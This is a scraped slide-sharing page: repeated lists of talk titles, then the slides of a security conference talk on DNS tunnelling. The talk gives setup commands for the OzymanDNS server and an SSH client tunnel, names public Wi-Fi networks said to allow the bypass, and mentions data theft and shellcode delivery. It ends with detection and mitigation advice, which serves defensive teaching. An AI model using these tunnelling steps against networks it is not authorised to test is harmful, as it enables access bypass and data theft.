DDoS mitigation in the real world
 
Black Ops of Fundamental Defense:
Black Ops of Fundamental Defense:Black Ops of Fundamental Defense:
Black Ops of Fundamental Defense:
 
Design Reviewing The Web
Design Reviewing The WebDesign Reviewing The Web
Design Reviewing The Web
 
Dmk Bo2 K7 Web
Dmk Bo2 K7 WebDmk Bo2 K7 Web
Dmk Bo2 K7 Web
 
Lecture17
Lecture17Lecture17
Lecture17
 
DNS Over HTTPS by Michael Casadevall
DNS Over HTTPS by Michael CasadevallDNS Over HTTPS by Michael Casadevall
DNS Over HTTPS by Michael Casadevall
 
Is DNS a Part of Your Cyber Security Strategy?
Is DNS a Part of Your Cyber Security Strategy? Is DNS a Part of Your Cyber Security Strategy?
Is DNS a Part of Your Cyber Security Strategy?
 
Understanding DNS Security
Understanding DNS SecurityUnderstanding DNS Security
Understanding DNS Security
 
DNSSEC and VoIP: Who are you really calling?
DNSSEC and VoIP: Who are you really calling?DNSSEC and VoIP: Who are you really calling?
DNSSEC and VoIP: Who are you really calling?
 
(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon
(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon
(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon
 
Bo2004
Bo2004Bo2004
Bo2004
 
Network Security R U Secure???
Network Security R U Secure???Network Security R U Secure???
Network Security R U Secure???
 
Detecting dns-tunneling-34152
Detecting dns-tunneling-34152Detecting dns-tunneling-34152
Detecting dns-tunneling-34152
 
DNS как линия защиты/DNS as a Defense Vector
DNS как линия защиты/DNS as a Defense VectorDNS как линия защиты/DNS as a Defense Vector
DNS как линия защиты/DNS as a Defense Vector
 
5.Dns Rpc Nfs
5.Dns Rpc Nfs5.Dns Rpc Nfs
5.Dns Rpc Nfs
 
5.Dns Rpc Nfs 2
5.Dns Rpc Nfs 25.Dns Rpc Nfs 2
5.Dns Rpc Nfs 2
 
Dns and irc
Dns and ircDns and irc
Dns and irc
 

More from Security BSides London

Your money, your media a DRMtastic (reverse|re) eng. tutorial
Your money, your media a DRMtastic (reverse|re) eng. tutorialYour money, your media a DRMtastic (reverse|re) eng. tutorial
Your money, your media a DRMtastic (reverse|re) eng. tutorialSecurity BSides London
 
You built a security castle and forgot the bridge…now users are climbing your...
You built a security castle and forgot the bridge…now users are climbing your...You built a security castle and forgot the bridge…now users are climbing your...
You built a security castle and forgot the bridge…now users are climbing your...Security BSides London
 
Agnitio: its static analysis, but not as we know it
Agnitio: its static analysis, but not as we know itAgnitio: its static analysis, but not as we know it
Agnitio: its static analysis, but not as we know itSecurity BSides London
 
The Funny Thing About Information Security
The Funny Thing About Information SecurityThe Funny Thing About Information Security
The Funny Thing About Information SecuritySecurity BSides London
 
Practical Crypto Attacks Against Web Applications
Practical Crypto Attacks Against Web Applications Practical Crypto Attacks Against Web Applications
Practical Crypto Attacks Against Web Applications Security BSides London
 
Jedi mind tricks for building application security programs
Jedi mind tricks for building application security programsJedi mind tricks for building application security programs
Jedi mind tricks for building application security programsSecurity BSides London
 

More from Security BSides London (12)

Security YMCA
Security YMCASecurity YMCA
Security YMCA
 
Penetration testing must die
Penetration testing must diePenetration testing must die
Penetration testing must die
 
Your money, your media a DRMtastic (reverse|re) eng. tutorial
Your money, your media a DRMtastic (reverse|re) eng. tutorialYour money, your media a DRMtastic (reverse|re) eng. tutorial
Your money, your media a DRMtastic (reverse|re) eng. tutorial
 
You built a security castle and forgot the bridge…now users are climbing your...
You built a security castle and forgot the bridge…now users are climbing your...You built a security castle and forgot the bridge…now users are climbing your...
You built a security castle and forgot the bridge…now users are climbing your...
 
Agnitio: its static analysis, but not as we know it
Agnitio: its static analysis, but not as we know itAgnitio: its static analysis, but not as we know it
Agnitio: its static analysis, but not as we know it
 
The Funny Thing About Information Security
The Funny Thing About Information SecurityThe Funny Thing About Information Security
The Funny Thing About Information Security
 
Breaking out of restricted RDP
Breaking out of restricted RDPBreaking out of restricted RDP
Breaking out of restricted RDP
 
Breaking, Entering and Pentesting
Breaking, Entering and Pentesting Breaking, Entering and Pentesting
Breaking, Entering and Pentesting
 
All your logs are belong to you!
All your logs are belong to you!All your logs are belong to you!
All your logs are belong to you!
 
Practical Crypto Attacks Against Web Applications
Practical Crypto Attacks Against Web Applications Practical Crypto Attacks Against Web Applications
Practical Crypto Attacks Against Web Applications
 
Jedi mind tricks for building application security programs
Jedi mind tricks for building application security programsJedi mind tricks for building application security programs
Jedi mind tricks for building application security programs
 
Cloud computing due diligence WTF?
Cloud computing due diligence WTF?Cloud computing due diligence WTF?
Cloud computing due diligence WTF?
 

Recently uploaded

unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 

Recently uploaded (20)

unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 

Dns tunnelling its all in the name

  • 1. DNS Tunnelling, its all in the name! Arron “finux” Finnon finux@finux.co.uk http://www.finux.co.uk
  • 2. Okay, DNS Tunnelling sounds a little complicated. You won't need a hard hat, a shovel or a drill, but you will need a shell account on a system which allows you control over port 53
  • 3. However, it is very likely that it is illegal unless it is in your own test environment
  • 4. So who am I, and why am I here? I ask the question every morning, I still haven't answered it, but I maybe able to answer it for you My Name is Arron, I have been involved in ethical hacking for a number of years. I'm currently at The University of Abertay Dundee as a student. I have spent sometime as a security consultant, and independent researcher. I have a reputation as being a little bit of a media/attention whore. I agree with that statement, so much so that I have a weekly podcast talking about geeky things: Finux Tech Weekly I have over the years gave a number of talks on a range of things related to hacking and security.
  • 5. So where can you find me? Email – finux@finux.co.uk Twitter – www.twitter.com/f1nux & www.twitter.com/finuxtechweekly Facebook – www.facebook.com/finux Podcast Site – www.finux.co.uk Skype – finux1
  • 6. Talk Out Line The History Involved Technical Overview Tools Available Those that “Bob” told me are effected A short how to on one set-up/configuration option Other potential uses for DNS Tunnelling Countermeasures Links Q&A
  • 7. Disclaimer Without doubt the legal implications of using the discussed techniques are immense. If you use this to obtain “Free Internet”, I would point out that if you go to JAIL its not very free, and of course it could quite possibly cost you a career too. If you have any doubt about the legalities of what you are doing then STOP it. If you do use this to break the law, and you do get caught. Your totally on your own, this is for educational purposes only. Feel free to let me know though, it will make a great anicdote and I'm happy to write to you during your stay. However as usual to defend we must know how to attack. “The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable.” - Sun Tzu Not if the hacker comes, but when they come......
  • 8. Intended Audience Here's the shock! Hackers! However I mean the playful advocates of technology when I use that term. I tend not to buy into the media definition of it. What I mean by hacker is; playful advocates of technology. If technical things excite you, then this is for you. I love security, i love hacking, i love taking things apart and i believe its a prerequisite for our trade. As a good friend of mine, who is now the chief of operations for first base. A long haired geek that goes by the name of Pete Wood; if you wern't electoricuted by the age of 10 this might not be the trade for you. I'm proud to say i was shocked by 6, and I'll hazard a guess I'm not the only one in this room.
  • 9. A Small Intro In September 2000 a post came across the Slashdot website informing its readers of an interesting use of DNS tunnelling for breaking out of locked down networks. It utilises that most networks regardless of their firewall, or their Access Controls Lists, would allow DNS look ups. Researchers found with crafted packets that they could in fact establish bi-direction IP traffic, they delivered a protocol named NSTX. However this concept became more widely established when the respected DNS security researcher Dan Kaminsky, released his Ozyman tool at Black hat in 2005, Kaminsky who in 2010 became one of ICANN's Trusted Community Representatives for the DNSSEC root certificate, has an unparalleled reputation when it comes to DNS security and it insecurities. Needless to say this release caught the attention of many security researchers, however worrying nearly 11 years after the discovery and 6 years since Kaminsky's Ozyman tool release, this vulnerability still lives on in a number of networks. All though DNS tunnelling could be seen as way to obtain free Internet on captive portals, it is also an effective tool in data theft. However it is hard to imagine the limitations when this is mixed with shellcode's. DNS tunnelling could be used to reverse connect a shellcode from target to attacker, the tunnel's effectiveness of traversing NAT makes it a worthy deployment.
  • 10. Some History So 1987 the the domain name protocol basically came into life, it was defined in the the RFC 1035. It superseded RFCs 882, 883, and 973. Around 13 years later a group of hackers started playing around with the concept of DNS tunnelling. Mainly due to gain free internet from a Microsoft update PPP dailin's. Most of these Microsoft PPP dialins allow you to use a Name server. These hackers later developed "NSTX Protocol", meaning "Name server Transfer Protocol" in doing so they finally managed to use one of Microsoft toll free numbers in Germany and tunnel their net connection over it. Iodine later became popular due to its password authentication however it was still very similar to NSTX. However as i have said i think it fair to say that the concept grabbed more attention when respected breaker of DNS Dan Kaminsky released a set of scripts at Black Hat 2005 which were written in perl and in reality very easy to deploy. For the purpose of today's talk i will focus on OzymanDNS
  • 11. Technical Overview Now we could take this from the stand point of a captive portal, which normally intercepts all web traffic until some sort of authentication is achieved. However we see regularly that a they still enable DNS enquiries. I way to check this on a captive portal would be to use either dig or nslookup if your running windows. If you are issued a private address then your out of luck, however if you receive the IP address of the domain name in question then DNS requests are allowed out. So if we revisit the Domain Name Systems set-up, we'll see that it has 13 root domain name servers responsible for the .com's, .org's, so on and so forth known as the Top Level Domain names or TLD for short. They are responsible down to the root domain such as example.com, then from there sub domains are delegated to their own server. Such as test.example.com. Each domain is configured in a zone file, and each zone file has a number of records configured within it. So an example would be an A record which stands for an address record, or a CNAME alias for an A record, we could see a MX record for handling mail, a NS record which points to a new DNS Server for that sub-domain, or a TXT record which handles text descriptions. It is the last two records that interest us.
  • 12. Technical Overview A hostname can only be 255 octets long, or 255 bytes. In addition a TXT record can also only be 255 bytes. So it lies within these 255 byte TXT records the potential for us to deliver a payload of data back within one of these records. If we could encode a formatted domain name request up to a maximum of 255 bytes, and then have that decoded back at our fake domain name server. Our fake domain name server could encode our response back and deliver that via a TXT record we now see the very plausible avenue of transmitting data.
  • 13. Technical Overview So what we would need in this situation is a fake domain name server listening on port 53, which will respond to requests, and a hostname which is in fact a delegated NS record pointing to a fake DNS Server. An example would be; inbound.example.com would point to server.inbound.example.com The zone file could look like this; inbound.example.com NS server.inbound.example.com server.inbound.example.com A 92.35.18.118 The A record would point to our fake domain name server, and our client would make its requests to the inbound sub-domain. Of course if you where using DynDNS.org it could be a simple as inbound.example.com NS finux.dyndns.org
  • 14. Technical Overview Now a free account at DynDNS.org does not allow you to delegate Name Servers. However freedns.afraid.org does. I happen to prefer the update client(s) on DynDNS, so I personally go for a freedns.afraid.org and point it to a DynDNS account. Personally I think this makes the set-up slightly more easier, and gives it an edge of portability. Now all DNS Tunnelling set-ups in some way use the delegated Name Servers. Now I admit I'm a Linux jock and so this configuration is based on my experience with Linux, there is some links on how to do this with a Windows set-up at the end. My advice to you would be to build a Virtual Machine either running Ubuntu/Debian which of course will make its deployment in your test environment pretty easy.
  • 15. Technical Overview As I have said for today's purpose we'll be looking at Kaminsky's OzymanDNS tool, in fact its a revised revision of it. OzymanDNS is broken down into 4 perl scripts. The server script is named nomde.pl which listens on a privileged port and in doing so requires sufficient permissions to do it; sudo ./nomde.pl -i 0.0.0.0 inbound.example.com The above command would set OzymanDNS server section to listen to all requests on the sub-domain inbound.example.com
  • 16. Technical Overview Now the OzymanDNS client is written to encode/decode and send the responses back via STDOUT which isn't overly useful however combined with the SSH config option "ProxyCommand" enables the ease of use this set of scripts has become renowned for. ssh -o ProxyCommand="./droute.pl sshdns.inbound.example.com" user@localhost The upstream data sent out will be encoded using Base32. After the data has been transmitted, there is a unique ID due to some DNS requests taking longer than others, the UDP protocol has no methods to check this. and either one of the keywords up or down, indicating whether the traffic's up- or downstream. Here is what an example request could look like; ntez375sy2qk7jsg2og3eswo2jujscb3r43as6m6hl2wsxobm7h2olu4tmaq.ly azbf2e2rdynrd3fldvdy2w3tifigy2csrx3cqczxyhnxygor72a7fx47uo.nwqy4o a3v5rx66b4aek5krzkdm5btgz6jbiwd57ubnohnknpcuybg7py.63026-0.id- 32227.up.sshdns.inbound.example.com
  • 17. Technical Overview The response comes as a DNS TXT record. A TXT record can hold arbitrary ASCII data and can hold upper-case letters as well as lower- case letters and numbers. So the responses come encoded with Base64 encoded. Such a response might look like the this. 695-8859.id-39201.down.sshdns.inbound.example.com. 0 IN TXT "AAAAlAgfAAAAgQDKrd3sFmf8aLX6FdU8ThUy3SRWGhotR6EsAavqH gBzH2khqsQHQjEf355jS7cT G+4a8kAmFVQ4mpEEJeBE6IyDWbAQ9a0rgOKcsaWwJ7GdngGm9jpv ReXX7S/2oqAIUFCn0M8=" "MHw9tR0kkDVZB7RCfCOpjfHrir7yuiCbt7FpyX8AAAABBQAAAAAAAAA A"
  • 18. Technical Overview So a quick recap of what is needed on our Debian like system. We we need to install some perl packages; sudo apt-get install screen libnet-dns-perl libmime-base32-perl In addition you may want to install ddclient as well and configure your dynamic sub-domain to point to the server. You'll also need to set-up SSH as well You will want to download the OzymanDNS scripts, I have made the latest version available on my site. wget http://finux.co.uk/demos/software/OzymanDNS-Splitbrain-Version.tar.gz Now as I have said the version of OzymanDNS is revised and the code cleaned up by Andreas Gohr of the Splitbrain.org website http://www.splitbrain.org/blog/2008-11/02-dns_tunneling_made_simple
  • 19. Technical Overview Our client configuration is as follows; sudo apt-get install libnet-dns-perl libmime-base32-perl And then a simple command command ssh -o ProxyCommand="./droute.pl sshdns.inbound.example.com" user@localhost
  • 20. Tools Available Iodine is based on NSTX as i have mentioned is a Linux only tool, however it works via producing a virtual network interface on the server and client, and those two virtual interfaces communicate with each other. Netcross is a little modular tool that might be useful in restricted network connections DNSCat is the basically NetCat for DNS
  • 21. Those that “Bob” told me are effected The Cloud Network – Such as the one's that cover Weatherspoons pubs and McDonald's BT Open Zone A certain University in North East Scotland – Which will soon be fixed Interestingly over 3g it has been reported that T-Mobile allow unfettered DNS queries. This could in fact be false, however if its true then really quite scary. Eastern Trains Remember its easily tested, a nslookup or a dig should tell you within seconds. Even if ping is blocked there is a good chance you could use that to determine if the next work is vulnerable to attack, as it will still obtain an IP address
  • 22. Other potential uses of DNS Tunnelling As discussed covert communications over an otherwise restricted channel. Data theft, as in you do not allow any SSH, FTP, SFTP so on and so forth. scp works with the OzymanDNS set-up By far the craziest I have seen is to deliver shell code via DNS Tunnel's. The interesting concept with tunnelling a shellcode over DNS is for starters this happens to null in void any potential NAT issues There is already a fair few PoC that highlight this concept. I have been reading of recent how we could use some of the Metasploit payloads, combined with DNSCat I have not had time to play anywhere near as much with this as I would have liked too. But needless to say I'm sure I'll get my chance
  • 23. Countermeasures The best way of detecting DNS tunnelling is by performing statistical anomaly detection on the network. Some characteristics of a DNS tunnel include: High volume of DNS requests from internal clients where little usually take place Significant difference in the format of these lookups as compared to regular ones i.e. Base32 and Base64 The total amount of data transferred over port 53 is much higher than usual DNS Tunnelling could actually be one of the best covert channels ever designed. In general, it proves quite challenging to stop this traffic, as there is no specific indication that it concerns IP over DNS tunnelling. There are however a number of ways to mitigate the threat to a certain degree.
  • 24. Countermeasures If you are running a for-a-fee access point, consider having your DNS server answer all queries with a local IP address until payment has been completed. Only afterwards should a client be able to perform DNS lookups that your server resolves to the internet. Many organizations do this currently by having HTTP requests rewritten to a local web server on which payment is due. This however still allows the client to resolve external domains, and as such, does not alleviate the covert channel. A potential solution is to set up a BIND server which has a local entry for all TLD's: get lists here and here. Set up a wildcard entry for each of these domains that points to your local web server that processes payments. Requests to any other domains or zones should not be handled recursively.
  • 25. Countermeasures One solution which is sometimes considered is to deny all queries for TXT records. The impact of this will in most cases would be limited, although certain functionality (such as SPF) may break. In general, only your incoming mail server will need to perform these lookups: taken a general split-DNS service on multiple servers, it should be feasible to work around this issue. There are precious little reasons why the average internal client should be able to perform lookups for TXT records. This approach is however fairly naive as tunnelling will still be possible through other record types. You will not be able to disable these others, such as CNAME, due to the heavy production impact. Remember blocking a domain name with X amount of calls within a period seems a good idea, until you think about the lookups your organisation makes to google in an hour
  • 26. Conclusions In conclusion I haven't really scratched the surface of what can be done here. The reality of it is, if your not looking at DNS traffic then someone may well be doing so. Its has the potential to be still one of the best covert channel's going and can be very technically difficult to detect. The uses for this are really limited by your imagination. If you can use this with 3g technology then this could make somewhat of a lethal weapon. However some pre-thought of what you could and should expect on your network You may think this connection would be slow, but within my links is a paper showing that speeds of up to 110 kilobytes a second
  • 27. Links Slashdot article on NSTX. http://slashdot.org/articles/00/09/10/2230242.shtml Kaminsky's Wikipedia page http://en.wikipedia.org/wiki/Dan_Kaminsky Kaminsky Release of the Tools he developed http://dankaminsky.com/2004/07/29/51/ Kaminsky's Black Hat paper http://www.doxpara.com/slides/BH_EU_05-Kaminsky.pdf Dan Kaminsky's 2005 Black hat talk http://www.splitbrain.org/blog/2008-11/02-dns_tunneling_made_simple Very good guide on setting up DNS Tunnels http://dnstunnel.de/ IVC Wikipedia article on DNS tunnelling http://beta.ivc.no/wiki/index.php/DNS_Tunneling
  • 28. Links Another further guide to tunnelling DNS http://www.h-i-r.net/2010/03/dns-tunneling-part-1-intro-and.html PDF paper from Black hat http://www.blackhat.com/presentations/bh-usa-08/Miller/BH_US_08_Ty_Miller_Reverse_DNS_Tunneling_Shellcode.pdf Heyoka paper http://shakacon.org/talks/Revelli-Leidecker_Heyoka.pdf Further guide to making to configuring OzymanDNS, however for Windows type systems http://cyberphob1a.wordpress.com/2008/02/10/dns-tunneling-part-i/ http://cyberphob1a.wordpress.com/2008/02/11/speeding-up-dns-tunneling/ http://cyberphob1a.wordpress.com/2008/03/08/dns-tunneling-updated-source/ DNS RFC ftp://ftp.rfc-editor.org/in-notes/rfc1035.txt
  • 29. Links Another set of software for TCP over DNS this one using Java instead of perl http://analogbit.com/tcp-over-dns_howto For Presentation Side Notes – Speeding Firefox for Low Bandwidth carriers http://www.ghacks.net/2008/07/13/optimize-firefox-for-low-traffic-volumes/ DNScat as a Payload with Metasploit http://www.skullsecurity.org/blog/2010/weaponizing-dnscat-with-shellcode-and-metasploit Reverse DNS Tunneling Shellcode (v0.3) Technical Details http://projectshellcode.com/?q=node/2 In the following tutorial, we will use the tool dns2tcp written by two guys working for HSC, a French security company. http://blog.rootshell.be/2007/03/22/dns2tcp-how-to-bypass-firewalls-or-captive-portals/ http://www.hsc.fr/ressources/outils/dns2tcp/download/ Traffic analysis approach to detecting DNS tunnels http://blog.vorant.com/2006/05/traffic-analysis-approach-to-detecting.html Tunneling shit over DNS http://www.modacity.net/forums/showthread.php?19755-Tunneling-shit-over-DNS
  • 31. Thank You For Your Time I hope it has been of interest Please feel free to come grab me later for a chat Don't forget to listen to the show www.finux.co.uk On a side note, I have never been on a night out in London. So I'll apologise for tonight tomorrow morning